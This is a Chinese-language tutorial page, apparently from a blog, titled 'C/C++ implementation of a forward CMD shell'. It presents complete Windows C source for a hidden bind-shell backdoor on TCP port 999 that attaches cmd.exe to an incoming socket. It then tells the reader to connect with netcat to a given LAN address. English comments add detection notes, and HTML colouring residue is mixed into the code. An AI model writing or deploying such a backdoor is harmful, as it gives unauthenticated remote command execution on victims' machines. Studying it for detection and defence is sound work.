C/C++实现正向CMDShell

1.首先使用vc6编译器编译后门,并运行

#pragma comment(lib,"ws2_32.lib")


#ifdef _MSC_VER
#pragma comment( linker, “/subsystem:"windows" /entry:"mainCRTStartup"“ )
#endif

#include <winsock2.h>
#include
<windows.h>
#define Port 999

/*
 * Entry point of the bind-shell backdoor listed on this page.
 *
 * What the code below establishes: it listens on TCP port `Port` (999, per
 * the #define above) on all local interfaces, accepts exactly one inbound
 * connection, starts the interpreter named by the %COMSPEC% environment
 * variable (typically cmd.exe) with its stdin/stdout/stderr redirected to the
 * connected socket, waits for that interpreter to exit, releases its handles
 * and returns 0.  No return value of any Winsock or Win32 call is checked, so
 * every step proceeds even when the previous one failed.
 *
 * Defender notes (detection and mitigation):
 *  - The linker pragma above requests the "windows" subsystem with a CRT
 *    entry point, so no console window appears while this runs; the child's
 *    window state is left at 0 (SW_HIDE) as noted below.
 *  - Telemetry that characterises this pattern: a process that opens a
 *    listening socket on an unusual port and then calls CreateProcess with
 *    bInheritHandles = TRUE and STARTF_USESTDHANDLES, where the child's
 *    standard handles are socket handles (the child is the %COMSPEC%
 *    interpreter).
 *  - A host firewall that drops unsolicited inbound connections defeats this
 *    variant outright: the remote party must connect in to port 999.
 *
 * The `<span ...>` fragments and `&amp;` sequences on several lines are
 * syntax-colouring residue from the original web page, not source text.
 */
int main()
{
// sSocket: the single accepted connection; cSocket: the listening socket.
SOCKET sSocket,cSocket;
STARTUPINFO si;
PROCESS_INFORMATION pi;
WSADATA wsaData;
// Used first as the local bind address, then reused as accept()'s
// out-parameter, so after accept() it holds the peer's address instead.
sockaddr_in sSockaddr;
// Command line handed to CreateProcess; filled from %COMSPEC% below.
char szCmdPath[MAX_PATH];

// Resolve the interpreter path from the environment.  Return value (and
// thus an unset or over-long COMSPEC) is not checked.
GetEnvironmentVariable(</span><span style="color: #800000;">"</span><span style="color: #800000;">COMSPEC</span><span style="color: #800000;">"</span><span style="color: #000000;">,szCmdPath,MAX_PATH);
ZeroMemory(</span>&amp;wsaData,<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(wsaData));
// Zeroing STARTUPINFO also sets si.wShowWindow to 0, i.e. SW_HIDE; nothing
// below changes it, so the child is created without a visible window.
ZeroMemory(</span>&amp;si,<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(STARTUPINFO));
ZeroMemory(</span>&amp;pi,<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(PROCESS_INFORMATION));

// Request Winsock 2.2; result not checked.
WSAStartup(</span><span style="color: #800080;">0x0202</span>,&amp;<span style="color: #000000;">wsaData);
// Plain TCP socket via WSASocket with dwFlags == 0.  NOTE(review): presumably
// chosen over socket() so the handle is non-overlapped and therefore usable
// as a child's standard handle - confirm against the Winsock docs.
cSocket</span>=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,<span style="color: #800080;">0</span>,<span style="color: #800080;">0</span><span style="color: #000000;">);
// Bind to every local interface on the fixed port from the #define.
sSockaddr.sin_addr.s_addr</span>=<span style="color: #000000;">INADDR_ANY;
sSockaddr.sin_family</span>=<span style="color: #000000;">AF_INET;
sSockaddr.sin_port</span>=<span style="color: #000000;">htons(Port);
// bind()/listen() results are ignored; a port already in use goes unnoticed.
bind(cSocket,(sockaddr</span>*)&amp;sSockaddr,<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(sSockaddr));
// Backlog of 1: the program services exactly one connection, then exits.
listen(cSocket,</span><span style="color: #800080;">1</span><span style="color: #000000;">);

</span><span style="color: #0000ff;">int</span> sLen=<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(sSockaddr);
// Blocks here until a peer connects.  On failure sSocket is INVALID_SOCKET,
// which is still passed on as the child's standard handles below.
sSocket</span>=accept(cSocket,(sockaddr*)&amp;sSockaddr,&amp;<span style="color: #000000;">sLen);
si.cb</span>=<span style="color: #0000ff;">sizeof</span><span style="color: #000000;">(si);
// STARTF_USESTDHANDLES makes the three hStd* fields below take effect;
// STARTF_USESHOWWINDOW makes the (zeroed) wShowWindow take effect.
si.dwFlags</span>=STARTF_USESTDHANDLES|<span style="color: #000000;">STARTF_USESHOWWINDOW;
// The connected socket becomes the child's stdin, stdout and stderr: this
// is the line that turns the interpreter into a network-attached shell and
// the key artefact for endpoint detection.
si.hStdInput</span>=<span style="color: #000000;">(HANDLE)sSocket;
si.hStdOutput</span>=<span style="color: #000000;">(HANDLE)sSocket;
si.hStdError</span>=<span style="color: #000000;">(HANDLE)sSocket;
// bInheritHandles = TRUE is required for the socket handles above to be
// valid in the child.  szCmdPath is passed as lpCommandLine (writable array,
// as CreateProcess requires).  Success is not checked.
CreateProcess(NULL,szCmdPath,NULL,NULL,TRUE,</span><span style="color: #800080;">0</span>,NULL,NULL,&amp;si,&amp;<span style="color: #000000;">pi);
// Block until the interpreter exits (i.e. until the remote session ends).
WaitForSingleObject(pi.hProcess,INFINITE);

// Release process/thread handles, both sockets and the Winsock library.
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
closesocket(cSocket);
closesocket(sSocket);
WSACleanup();

// Always 0, regardless of whether any step above succeeded.
</span><span style="color: #0000ff;">return</span> <span style="color: #800080;">0</span><span style="color: #000000;">;

}

 

连接时使用 nc 工具连接即可。下载地址：https://eternallybored.org/misc/netcat/

 

nc 执行命令 nc64.exe -t 192.168.1.12 999 即可连接到主机